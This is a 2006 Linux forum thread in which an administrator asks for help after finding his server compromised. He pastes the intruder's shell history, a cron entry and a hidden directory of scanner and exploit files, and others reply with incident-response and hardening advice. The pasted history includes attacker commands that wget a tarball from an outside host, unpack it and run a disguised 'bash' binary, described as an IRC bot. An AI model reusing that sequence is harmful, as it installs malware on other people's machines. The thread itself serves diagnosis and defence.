|
|
|
|
|
|
| Author |
Message |
news@celticbear.com
*nix forums Guru Wannabe
Joined: 16 May 2005
Posts: 125
|
 Posted: Tue Apr 18, 2006 2:45 pm Post subject:
need help with root hack
|
|
|
.... I think that's what happened. Pretty sure. I'm pretty newbie with
Linux security, but the following seems pretty obvious to me.
I guess I could use some suggestions regarding how serious this is, if
it can be fixed/repaired/closed, and ideas of what may have been done.
How the heck did it happen? What can I do to prevent it?
And if I were running Slackware 10.2, would this have been less likely
to happen?
Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
log:
Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
/.access.log/y2kupdate >/root/what 2>&1)
Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
bytes of output but got status 0x0046 )
So I looked into the /home/testuser and found .bash_history:
ls
wc -l uniq.txt
ls
../eigei 100 &
ps -x
ls
exit
ps -x
exit
w
ps -x
cd //tmp/." ";ls -af
cd w00t;ls
cat vuln.txt
wc -l vuln.txt
ps -x
exit
w
ps -x
cd //tmp/." "/woot;ls
cd //tmp/." "/w00t;ls
cat vuln.txt
mv 0 pscan2;ls
wc -l uniq.txt
../eigei 100 &
exit
w
ps -x
cat //tmp/." "/w00t/vuln.txt
ls //tmp/." "/w00t
exit
w
ps x
kill -9 31257 31256
passwd
/sbin/ifconfig |grep inet
cat /proc/cpuinfo
w
uname -a
w
ps x
cat /proc/cpuinfo
w
ps x
cat /proc/cpuinfo
w
ps x
cat /proc/cpuinfo
ls -a
cd /var/tmp
ls -a
mkdir ." "
cd ." "
ls -a
tar zxvf omar.tar.gz
rm -rf omar.tar.gz
cd .f
mv x bash
export PATH="."
bash
w
ps x
ls -a
cat /proc/cpuinfo
ls -
a
ls -a
cd /var/tmp
ls -a
cd ." "
ls -a
cd .f
ls -a
export PATH="."
bash
w
ps x
cat /proc/cpuinfo
w
ps x
cd /var/tmp
ls -a
cd ." "
ls -a
cat /etc/hosts
cat /proc/cpuinfo
ls-a
cd .f
ls -a
export PATH="."
bash
w
ps x
cd /vart/emp
ls -acd /var/tmp
ls -a
cd /var/tmp
ls -a
cat /etc/hosts
ls -a
rm -rf ." "
/sbin/ifconfig -a |grep inet
cat /proc/cpuinfo
ls- a
ls- a
wget archive.lydo.org/omar1.tgz
tar zxvf omar1.tgz
rm -rf omar1.tgz
cd .f
mv x bash
../bash
ps x
kill -9 2591
export PATH="."
bash
And a bunch of stuff above that with various text files.
So I looked at /tmp and found a second "." directory.
[root@fileserve w00t]# pwd
/tmp/. /w00t
and in there is:
[root@fileserve w00t]# ls -al
total 11752
drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
-rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
-rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
-rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
-rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
-rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
-rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
-rwxr-xr-x 1 523 525 121 Apr 21 2003 make
-rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
-rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
-rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
-rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
-rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
-rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
-rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
-rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
-rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
-rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
-rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
-rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
-rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
-rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c
I removed the user "testuser", and I'm about to remove this dir.
But I guess I kind of need to know how bad the damage is.
Were they able to get root access? Do they likely know all the
passwords?
Would changing the passwords even work, or do they likely have some
kind of keylogger installed?
Any ideas? This is completely new to me.
Thanks!
-Liam |
|
| Back to top |
|
 |
Schraalhans Keukenmeester
*nix forums beginner
Joined: 20 Feb 2005
Posts: 35
|
| Posted: Tue Apr 18, 2006 3:30 pm Post subject:
Re: need help with root hack
|
|
|
news@celticbear.com wrote:
| Quote: | ... I think that's what happened. Pretty sure. I'm pretty newbie with
Linux security, but the following seems pretty obvious to me.
I guess I could use some suggestions regarding how serious this is, if
it can be fixed/repaired/closed, and ideas of what may have been done.
How the heck did it happen? What can I do to prevent it?
And if I were running Slackware 10.2, would this have been less likely
to happen?
Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
log:
Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
/.access.log/y2kupdate >/root/what 2>&1)
Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
bytes of output but got status 0x0046 )
So I looked into the /home/testuser and found .bash_history:
ls
wc -l uniq.txt
ls
./eigei 100 &
ps -x
ls
exit
ps -x
exit
w
ps -x
cd //tmp/." ";ls -af
cd w00t;ls
cat vuln.txt
wc -l vuln.txt
ps -x
exit
w
ps -x
cd //tmp/." "/woot;ls
cd //tmp/." "/w00t;ls
cat vuln.txt
mv 0 pscan2;ls
wc -l uniq.txt
./eigei 100 &
exit
w
ps -x
cat //tmp/." "/w00t/vuln.txt
ls //tmp/." "/w00t
exit
w
ps x
kill -9 31257 31256
passwd
/sbin/ifconfig |grep inet
cat /proc/cpuinfo
w
uname -a
w
ps x
cat /proc/cpuinfo
w
ps x
cat /proc/cpuinfo
w
ps x
cat /proc/cpuinfo
ls -a
cd /var/tmp
ls -a
mkdir ." "
cd ." "
ls -a
tar zxvf omar.tar.gz
rm -rf omar.tar.gz
cd .f
mv x bash
export PATH="."
bash
w
ps x
ls -a
cat /proc/cpuinfo
ls -
a
ls -a
cd /var/tmp
ls -a
cd ." "
ls -a
cd .f
ls -a
export PATH="."
bash
w
ps x
cat /proc/cpuinfo
w
ps x
cd /var/tmp
ls -a
cd ." "
ls -a
cat /etc/hosts
cat /proc/cpuinfo
ls-a
cd .f
ls -a
export PATH="."
bash
w
ps x
cd /vart/emp
ls -acd /var/tmp
ls -a
cd /var/tmp
ls -a
cat /etc/hosts
ls -a
rm -rf ." "
/sbin/ifconfig -a |grep inet
cat /proc/cpuinfo
ls- a
ls- a
wget archive.lydo.org/omar1.tgz
tar zxvf omar1.tgz
rm -rf omar1.tgz
cd .f
mv x bash
./bash
ps x
kill -9 2591
export PATH="."
bash
And a bunch of stuff above that with various text files.
So I looked at /tmp and found a second "." directory.
[root@fileserve w00t]# pwd
/tmp/. /w00t
and in there is:
[root@fileserve w00t]# ls -al
total 11752
drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
-rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
-rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
-rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
-rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
-rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
-rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
-rwxr-xr-x 1 523 525 121 Apr 21 2003 make
-rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
-rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
-rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
-rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
-rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
-rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
-rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
-rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
-rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
-rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
-rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
-rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
-rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
-rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c
I removed the user "testuser", and I'm about to remove this dir.
But I guess I kind of need to know how bad the damage is.
Were they able to get root access? Do they likely know all the
passwords?
Would changing the passwords even work, or do they likely have some
kind of keylogger installed?
Any ideas? This is completely new to me.
Thanks!
-Liam
Don't trust your box anymore. Apparantly some program has been installed |
to take the place of bash. Hard to tell from here which version you
are using yourself right now. Easy to guess the new Bash does more than
handle your keystrokes for you....
Your (his) bashhistory stops there, simply because a new bash has taken
over. ASSUME the worst!
Was testuser a user you created before?
What do your firewall rules/policies look like ?
(which) Users allowed to SSh to your machine from remote locations?
What services do you have running at opened ports?
Don't throw the 'evidence' away!. save it in an archive on a cdrom or
diskette and keep that for later analysis. Be glad you FOUND the
evidence, many hacked boxen are only discovered as such much later.
Block the user, kill the WAN connection.
Maybe you can try nmap to see what ports are open on your box to the
outside world. If you want me or someone else to have a look what ports
are open, you could pm someone, or better, use an online service to have
your pc scanned. Better still (as long as you are sure no other hosts on
your LAN are affected), run nmap on those to see what services/ports
your compromised box advertises through the firewall.
chkrootkit and rkhunter (both available as yum-able rpms I believe) can
help spot rootkits on your box.
New setup is advisable, if not mandatory. Someone installing his own
bash surely isn't doing that just to see if he can...
Next install, make sure you use tripwire or AIDE or similar to make a
checksum database of all the relevant stuff on your machine. That way
you at least can easily detect which programs/files have been affected
after a break-in. Be sure to keep the database up-to-date and stored
somewhere safe (i.e. write-once media or external device, floppies, etc
etc.)
HTH
Sh. |
|
| Back to top |
|
|
news@celticbear.com
*nix forums Guru Wannabe
Joined: 16 May 2005
Posts: 125
|
| Posted: Tue Apr 18, 2006 4:27 pm Post subject:
Re: need help with root hack
|
|
|
Schraalhans Keukenmeester wrote:
| Quote: | news@celticbear.com wrote:
... I think that's what happened. Pretty sure. I'm pretty newbie with
Linux security, but the following seems pretty obvious to me.
I guess I could use some suggestions regarding how serious this is, if
it can be fixed/repaired/closed, and ideas of what may have been done.
How the heck did it happen? What can I do to prevent it?
And if I were running Slackware 10.2, would this have been less likely
to happen?
Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
log:
Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
/.access.log/y2kupdate >/root/what 2>&1)
Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
bytes of output but got status 0x0046 )
So I looked into the /home/testuser and found .bash_history:
ls
[..snip..]
export PATH="."
bash
And a bunch of stuff above that with various text files.
So I looked at /tmp and found a second "." directory.
[root@fileserve w00t]# pwd
/tmp/. /w00t
and in there is:
[root@fileserve w00t]# ls -al
total 11752
drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
-rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
-rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
-rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
-rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
-rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
-rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
-rwxr-xr-x 1 523 525 121 Apr 21 2003 make
-rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
-rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
-rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
-rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
-rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
-rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
-rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
-rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
-rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
-rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
-rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
-rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
-rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
-rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c
I removed the user "testuser", and I'm about to remove this dir.
But I guess I kind of need to know how bad the damage is.
Were they able to get root access? Do they likely know all the
passwords?
Would changing the passwords even work, or do they likely have some
kind of keylogger installed?
Any ideas? This is completely new to me.
Thanks!
-Liam
Don't trust your box anymore. Apparantly some program has been installed
to take the place of bash. Hard to tell from here which version you
are using yourself right now. Easy to guess the new Bash does more than
handle your keystrokes for you....
Your (his) bashhistory stops there, simply because a new bash has taken
over. ASSUME the worst!
|
Yeah, I'm going to rebuild the box. =/
Think Slackware is any more secure out-of-the-box? FC4?
| Quote: |
Was testuser a user you created before?
What do your firewall rules/policies look like ?
(which) Users allowed to SSh to your machine from remote locations?
What services do you have running at opened ports?
|
To be honest, I have no recolection of if I created it or not. If I
did, it probably didn't have a good password.
(*thud*)
I have no idea what my firewall rules look like. =(
I once looked into IPTABLES and it was like having to learn a whole new
language, and not a friendly one either. I just used the built-in
Fedora Core firewall manager and only had ports 22 and 80 open.
Fortunately I do know enough to have in my /etc/sshd_config:
PermitRootLogin no
AllowUsers liam duane
So, that's a not bad thing I guess.
But, how do I check what services I have running on open ports??
| Quote: | Don't throw the 'evidence' away!. save it in an archive on a cdrom or
diskette and keep that for later analysis. Be glad you FOUND the
evidence, many hacked boxen are only discovered as such much later.
Block the user, kill the WAN connection.
|
Yeah, before I removed the testuser home dir and that hidden folder in
tmp, I copied them over to /root so I could look at them.
I'll move them somewhere off the PC.
Now if I could only really understand what it's telling me. =/
| Quote: | Maybe you can try nmap to see what ports are open on your box to the
outside world. If you want me or someone else to have a look what ports
are open, you could pm someone, or better, use an online service to have
your pc scanned. Better still (as long as you are sure no other hosts on
your LAN are affected), run nmap on those to see what services/ports
your compromised box advertises through the firewall.
|
Uhm, OK. I used grc.com's ShieldsUp
and according to it, only 22 and 80 are open to the outside. All else
is "stealthed."
I'll see what I can do about nmap from the outside.
| Quote: | chkrootkit and rkhunter (both available as yum
-able rpms I believe) can
help spot rootkits on your box.
|
Well, I ran chkrootkit and got this:
a LOT of entied labeled "not infected" and the like, and then...
Checking `chkutmp'... The tty of the following user process(es) were
not found
in /var/run/utmp !
! RUID PID TTY CMD
! root 3128 tty4 /sbin/mingetty tty4
! root 3134 tty5 /sbin/mingetty tty5
! root 3140 tty6 /sbin/mingetty tty6
chkutmp: nothing deleted
[root@fileserve chkrootkit-0.46a]# ./chkrootkit ps ls sniffer
ROOTDIR is `/'
Checking `ps'... not infected
Checking `ls'... not infected
Checking `sniffer'... eth0: PF_PACKET(/usr/local/bin/snort)
I don't understand the tty thing. Is that good or bad?
rkhunter (these are cool programs!) and it came up with:
[..]
* Application version scan
- GnuPG 1.2.4 [ OK ]
- Apache 2.0.51 [ Old or
patched version ]
- Bind DNS 9.2.3 [ OK ]
- OpenSSL 0.9.7a [ Old or
patched version ]
- PHP 4.3.10 [ Old or
patched version ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.6.1p2 [ Old or
patched version ]
[..]
---------------------------- Scan results ----------------------------
MD5
MD5 compared: 49
Incorrect MD5 checksums: 0
File scan
Scanned files: 342
Possible infected files: 0
Application scan
Vulnerable applications: 4
Now, you mentioned bash was replaced... htat didn't seem to detect
that. Yikes. =(
| Quote: | New setup is advisable, if not mandatory. Someone installing his own
bash surely isn't doing that just to see if he can...
Next install, make sure you use tripwire or AIDE or similar to make a
checksum database of all the relevant stuff on your machine. That way
you at least can easily detect which programs/files have been affected
after a break-in. Be sure to keep the database up-to-date and stored
somewhere safe (i.e. write-once media or external device, floppies, etc
etc.)
|
I'm looking into tripwire for the new install.
Still I wonder, which will be the more useful and secure for the Linux
security newbie like me. FC 4 or Slackware 10.2.
=/
Thanks for all the help! This is a lot of great advice and
information!!
BTW, I ran chkrootkit on another server in a different WAN, and got:
[root@s75712 chkrootkit-0.46a]# ./chkrootkit -q
warning, got duplicate tcp line.
warning, got duplicate tcp line.
/usr/lib/perl5/site_perl/5.8.5/i386-linux-thread-multi/auto/Image/Magick/.packlist
/usr/lib/perl5/5.8.5/i386-linux-thread-multi/.packlist
/usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/auto/mod_perl/.packlist
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
INFECTED (PORTS: 31337)
What can you tell me about these findings?
What is a duplicate TCP line? And more importantly, how can I find out
what's going on with port 31337! ("elite." Cute. Not.)
THANKS!!
-Liam |
|
| Back to top |
|
|
stan@worldbadminton.com
*nix forums beginner
Joined: 06 Oct 2005
Posts: 10
|
| Posted: Tue Apr 18, 2006 4:42 pm Post subject:
Re: need help with root hack
|
|
|
In comp.os.linux.misc news@celticbear.com <news@celticbear.com> wrote:
: Schraalhans Keukenmeester wrote:
:> over. ASSUME the worst!
: Yeah, I'm going to rebuild the box. =/
: Think Slackware is any more secure out-of-the-box? FC4?
Any of the major releases will be plenty secure IF you
(1) set up security properly in the first place- including
shutting down all access except what you really need,
leaving good firewall in place, never running as root, etc.
(2) very regularly download and install all security updates.
An external firewall ( like a dedicated firewall box )
is an extra layer that can help a bunch.
As with any security nothing will be 100% protection from the
really determined hacker short of eliminating all network
access, but the casual hacker will be very well stopped
by normal security.
Stan
--
Stan Bischof ("stan" at the below domain)
www.worldbadminton.com |
|
| Back to top |
|
|
Ben@atomnet.co.uk
*nix forums beginner
Joined: 18 Apr 2006
Posts: 1
|
| Posted: Tue Apr 18, 2006 5:26 pm Post subject:
Re: need help with root hack
|
|
|
I took a look at the file they downloaded/extracted/installed onto your
machine. It's an IRC Bot, probably used for advertising/flooding, etc. |
|
| Back to top |
|
|
news@celticbear.com
*nix forums Guru Wannabe
Joined: 16 May 2005
Posts: 125
|
| Posted: Tue Apr 18, 2006 6:23 pm Post subject:
Re: need help with root hack
|
|
|
stan@worldbadminton.com wrote:
| Quote: | In comp.os.linux.misc news@celticbear.com <news@celticbear.com> wrote:
: Schraalhans Keukenmeester wrote:
:> over. ASSUME the worst!
: Yeah, I'm going to rebuild the box. =/
: Think Slackware is any more secure out-of-the-box? FC4?
Any of the major releases will be plenty secure IF you
(1) set up security properly in the first place- including
shutting down all access except what you really need,
leaving good firewall in place, never running as root, etc.
(2) very regularly download and install all security updates.
An external firewall ( like a dedicated firewall box )
is an extra layer that can help a bunch.
As with any security nothing will be 100% protection from the
really determined hacker short of eliminating all network
access, but the casual hacker will be very well stopped
by normal security.
|
Thanks for the reply!
Someone else said "security is a process, not an application." I'm
taking that to heart.
I do have an IP-Cop box between the 'net and the compromised machine,
but it was in the DMZ with port 80 forwarded to it.
I've decided to go with Slackware because of more efficient out of the
box, and it's going to force me to learn more about security rather
than allowing me to rely on pre-packaged stuff from RedHat.
Thanks for the feedback!
-Liam |
|
| Back to top |
|
|
news@celticbear.com
*nix forums Guru Wannabe
Joined: 16 May 2005
Posts: 125
|
| Posted: Tue Apr 18, 2006 6:25 pm Post subject:
Re: need help with root hack
|
|
|
Ben@atomnet.co.uk wrote:
| Quote: | I took a look at the file they downloaded/extracted/installed onto your
machine. It's an IRC Bot, probably used for advertising/flooding, etc.
|
Thanks for the reply!
That's kind of what I was thinking, but couldn't be sure.
Someone else confirmed my own suspicions that because so much evidence
was left behind and not much care to clean up after themselves, it was
likely a scriptkiddie who was only interested in installing spam
software, and not really interested or knowledgeable about gaining root
access and controlling the box.
I'm going to rebuild it anyway, of course.
Thanks again!
-Liam |
|
| Back to top |
|
|
Bill Davidsen
*nix forums Guru Wannabe
Joined: 22 Mar 2005
Posts: 217
|
| Posted: Fri Apr 21, 2006 6:43 pm Post subject:
Re: need help with root hack
|
|
|
| Quote: | Thanks for the reply!
Someone else said "security is a process, not an application." I'm
taking that to heart.
I do have an IP-Cop box between the 'net and the compromised machine,
but it was in the DMZ with port 80 forwarded to it.
I've decided to go with Slackware because of more efficient out of the
box, and it's going to force me to learn more about security rather
than allowing me to rely on pre-packaged stuff from RedHat.
|
You need to define your use and goals before selecting a distribution.
If you really want secure, something like CenTOS is good, because it's
based on the RHEL top of the line commercial Linux, and very stable.
Security releases come out quickly. If you want good security and more
cutting edge than a stable release, I would go FC4 (or FC5 for more
cutting edge and less experience from users).
I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.
It's nice to learn about firewalls and roll your own, but right now you
are learning by doing post mortem after being hacked. It's a great way
to learn if you don't mind the "being hacked" part. I would suggest that
a firewall built by a distribution program is likely to work better than
what you are likely to write at the moment.
If you really want security, running virtual machines with xen or
similar is a learning path.
--
-bill davidsen (davidsen@tmr.com)
"The secret to procrastination is to put things off until the
last possible moment - but no longer" -me |
|
| Back to top |
|
|
Lawrence D'Oliveiro
*nix forums Guru
Joined: 25 Mar 2005
Posts: 723
|
| Posted: Sat Apr 22, 2006 8:49 am Post subject:
Re: need help with root hack
|
|
|
In article <aJ92g.4242$mu2.2227@newssvr24.news.prodigy.net>,
Bill Davidsen <davidsen@tmr.com> wrote:
| Quote: | I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.
|
Don't rely on security-through-obscurity. |
|
| Back to top |
|
|
Stachu 'Dozzie' K.
*nix forums Guru Wannabe
Joined: 30 Mar 2005
Posts: 250
|
| Posted: Sat Apr 22, 2006 2:30 pm Post subject:
Re: need help with root hack
|
|
|
On 22.04.2006, Lawrence D'Oliveiro <ldo@geek-central.gen.new_zealand> wrote:
| Quote: | In article <aJ92g.4242$mu2.2227@newssvr24.news.prodigy.net>,
Bill Davidsen <davidsen@tmr.com> wrote:
I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.
Don't rely on security-through-obscurity.
|
It's not for security, I think. It's just for keeping logs clear :)
--
Feel free to correct my English
Stanislaw Klekot |
|
| Back to top |
|
|
Matt_left_coast
*nix forums Guru
Joined: 20 Feb 2005
Posts: 831
|
| Posted: Sat Apr 22, 2006 3:48 pm Post subject:
Re: need help with root hack
|
|
|
Lawrence D'Oliveiro wrote:
| Quote: | In article <aJ92g.4242$mu2.2227@newssvr24.news.prodigy.net>,
Bill Davidsen <davidsen@tmr.com> wrote:
I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.
Don't rely on security-through-obscurity.
|
Port-knocking is not "security-through-obscurity" any more than a
combination lock is "security-through-obscurity". If the need it to allow
connections from "random IPs" It is FAR, FAR better than just leaving the
port open to the world (on any port). |
|
| Back to top |
|
|
Lawrence D'Oliveiro
*nix forums Guru
Joined: 25 Mar 2005
Posts: 723
|
| Posted: Mon Apr 24, 2006 4:29 am Post subject:
Re: need help with root hack
|
|
|
In article <1212659.HCNjaZ3pTA@rcn.com>,
matt_left_coast <not@chance.org> wrote:
| Quote: | Lawrence D'Oliveiro wrote:
In article <aJ92g.4242$mu2.2227@newssvr24.news.prodigy.net>,
Bill Davidsen <davidsen@tmr.com> wrote:
I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.
Don't rely on security-through-obscurity.
Port-knocking is not "security-through-obscurity" any more than a
combination lock is "security-through-obscurity".
|
Wrong analogy.
The right analogy would be a "secret knock" that you _hope_ nobody else
is listening to. |
|
| Back to top |
|
|
Google
|
|
| Back to top |
|
|
|
|
The time now is Sat Jan 10, 2009 4:56 am | All times are GMT
|
|
Mobile Phones | Credit Scores | eHarmony | Advertising | Credit Expert
|
|
Copyright © 2004-2005 DeniX Solutions SRL
|
|
|
|
Other DeniX Solutions sites:
Unix/Linux blog |
electronics forum |
medicine forum |
science forum |
|
|
Privacy Policy
|
Powered by phpBB © 2001, 2005 phpBB Group
|
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
Forum index
»
*nix
»
Linux
»
security
